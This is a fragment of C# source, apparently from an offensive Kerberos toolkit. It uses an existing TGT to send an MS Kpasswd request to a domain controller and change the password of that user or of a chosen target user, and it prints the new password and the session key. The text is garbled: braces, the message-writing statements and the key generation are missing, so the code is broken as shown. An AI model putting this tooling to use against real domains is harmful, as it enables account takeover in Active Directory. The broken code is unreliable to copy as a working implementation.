            // implements the Kerberos-based password reset originally disclosed by Aorato
            //      This function is misc::changepw in Kekeo
            // Takes a valid TGT .kirbi and builds a MS Kpasswd password change sequence
            //      AP-REQ with randomized sub session key
            //      KRB-PRIV structure containing ChangePasswdData, enc w/ the sub session key
            // reference: Microsoft Windows 2000 Kerberos Change Password and Set Password Protocols (RFC3244)

            string dcIP = Networking.GetDCIP(domainController);

            if (String.IsNullOrEmpty(dcIP))

            // extract the user and domain from the existing .kirbi ticket
            string userName   = kirbi.enc_part.ticket_info[0].pname.name_string[0];
            string userDomain = kirbi.enc_part.ticket_info[0].prealm;

            if (targetUser == null)
                Console.WriteLine("[*] Changing password for user: {0}@{1}", userName, userDomain);
                Console.WriteLine("[*] Resetting password for target user: {0}", targetUser);

            Console.WriteLine("[*] New password value: {0}", newPassword);

            // build the AP_REQ using the user ticket's keytype and key
            Console.WriteLine("[*] Building AP-REQ for the MS Kpassword request");
            AP_REQ ap_req = new AP_REQ(userDomain, userName, kirbi.tickets[0], kirbi.enc_part.ticket_info[0].key.keyvalue, (Interop.KERB_ETYPE)kirbi.enc_part.ticket_info[0].key.keytype, Interop.KRB_KEY_USAGE_AP_REQ_AUTHENTICATOR);

            // create a new session subkey for the Authenticator and match the encryption type of the user key
            Console.WriteLine("[*] Building Authenticator with encryption key type: {0}", (Interop.KERB_ETYPE)kirbi.enc_part.ticket_info[0].key.keytype);
            ap_req.authenticator.subkey         = new EncryptionKey();
            ap_req.authenticator.subkey.keytype = kirbi.enc_part.ticket_info[0].key.keytype;

            // generate a random session subkey
            Random random = new Random();

            byte[]             randKeyBytes;
            Interop.KERB_ETYPE randKeyEtype = (Interop.KERB_ETYPE)kirbi.enc_part.ticket_info[0].key.keytype;
            if (randKeyEtype == Interop.KERB_ETYPE.rc4_hmac)
                randKeyBytes = new byte[16];
                ap_req.authenticator.subkey.keyvalue = randKeyBytes;
            else if (randKeyEtype == Interop.KERB_ETYPE.aes256_cts_hmac_sha1)
                randKeyBytes = new byte[32];
                ap_req.authenticator.subkey.keyvalue = randKeyBytes;
                Console.WriteLine("[X] Only rc4_hmac and aes256_cts_hmac_sha1 key hashes supported at this time!");

            Console.WriteLine("[*] base64(session subkey): {0}", Convert.ToBase64String(randKeyBytes));

            // randKeyBytes is now the session key used for the KRB-PRIV structure

            var rand = new Random();

            ap_req.authenticator.seq_number = (UInt32)rand.Next(1, Int32.MaxValue);

            // now build the KRV-PRIV structure
            Console.WriteLine("[*] Building the KRV-PRIV structure");
            KRB_PRIV changePriv = new KRB_PRIV(randKeyEtype, randKeyBytes);

            // the new password to set for the user
            if (targetUser != null)
                var userParts = targetUser.Split('\\');
                if (userParts.Length != 2)
                    Console.WriteLine("[X] /targetuser should be in the format domain.com\\username!");
                changePriv.enc_part = new EncKrbPrivPart(userParts[1], userParts[0].ToUpper(), newPassword, "lol");
                changePriv.enc_part = new EncKrbPrivPart(newPassword, "lol");

            // now build the final MS Kpasswd request
            byte[] apReqBytes      = ap_req.Encode().Encode();
            byte[] changePrivBytes = changePriv.Encode().Encode();

            short messageLength = (short)(apReqBytes.Length + changePrivBytes.Length + 6);
            short version       = -128;

            BinaryWriter bw = new BinaryWriter(new MemoryStream());

            //Message Length

            // Version (Reply)

            //AP_REQ Length



            // KPASSWD_DEFAULT_PORT = 464
            byte[] response = Networking.SendBytes(dcIP, 464, ((MemoryStream)bw.BaseStream).ToArray());
            if (response == null)

                AsnElt responseAsn = AsnElt.Decode(response, false);

                // check the response value
                int responseTag = responseAsn.TagValue;

                if (responseTag == 30)
                    // parse the response to an KRB-ERROR
                    KRB_ERROR error = new KRB_ERROR(responseAsn.Sub[0]);
                    Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code);
            catch { }

            // otherwise parse the resulting KRB-PRIV from the server
            BinaryReader br           = new BinaryReader(new MemoryStream(response));
            short        respMsgLen   = IPAddress.NetworkToHostOrder(br.ReadInt16());
            short        respVersion  = IPAddress.NetworkToHostOrder(br.ReadInt16());
            short        respAPReqLen = IPAddress.NetworkToHostOrder(br.ReadInt16());

            byte[] respAPReq   = br.ReadBytes(respAPReqLen);
            byte[] respKRBPriv = br.ReadBytes((int)(br.BaseStream.Length - br.BaseStream.Position));

            // decode the KRB-PRIV response
            AsnElt respKRBPrivAsn = AsnElt.Decode(respKRBPriv, false);

            foreach (AsnElt elem in respKRBPrivAsn.Sub[0].Sub)
                if (elem.TagValue == 3)
                    byte[] encBytes    = elem.Sub[0].Sub[1].GetOctetString();
                    byte[] decBytes    = Crypto.KerberosDecrypt(randKeyEtype, Interop.KRB_KEY_USAGE_KRB_PRIV_ENCRYPTED_PART, randKeyBytes, encBytes);
                    AsnElt decBytesAsn = AsnElt.Decode(decBytes, false);

                    byte[] responseCodeBytes = decBytesAsn.Sub[0].Sub[0].Sub[0].GetOctetString();

                    br = new BinaryReader(new MemoryStream(responseCodeBytes));
                    short resultCode = IPAddress.NetworkToHostOrder(br.ReadInt16());
                    if (resultCode == 0)
                        Console.WriteLine("[+] Password change success!");
                        byte[] resultMessage = br.ReadBytes((int)(br.BaseStream.Length - br.BaseStream.Position));
                        string resultError   = "";

                        if (resultMessage.Length > 2)
                            if (resultMessage[0] == 0 && resultMessage[1] == 0)
                                br = new BinaryReader(new MemoryStream(resultMessage));
                                int minPasswordLen                 = IPAddress.NetworkToHostOrder(br.ReadInt32());
                                int passwordHistory                = IPAddress.NetworkToHostOrder(br.ReadInt32());
                                PasswordProperties pprops          = (PasswordProperties)IPAddress.NetworkToHostOrder((br.ReadInt32()));
                                TimeSpan           expire          = TimeSpan.FromTicks(IPAddress.NetworkToHostOrder(br.ReadInt64()));
                                TimeSpan           min_passwordage = TimeSpan.FromTicks(IPAddress.NetworkToHostOrder(br.ReadInt64()));
                                resultError = $"Policy: \n\tMinimum Length: {minPasswordLen}\n\tPassword History: {passwordHistory}\n\tFlags: {pprops}\n\tExpiry: {expire:%d} day(s)\n\tMinimum Password Age: {min_passwordage:%d} day(s)";
                                resultError = Encoding.UTF8.GetString(resultMessage);

                        Console.WriteLine("[X] Password change error: {0} {1}", (Interop.KADMIN_PASSWD_ERR)resultCode, resultError);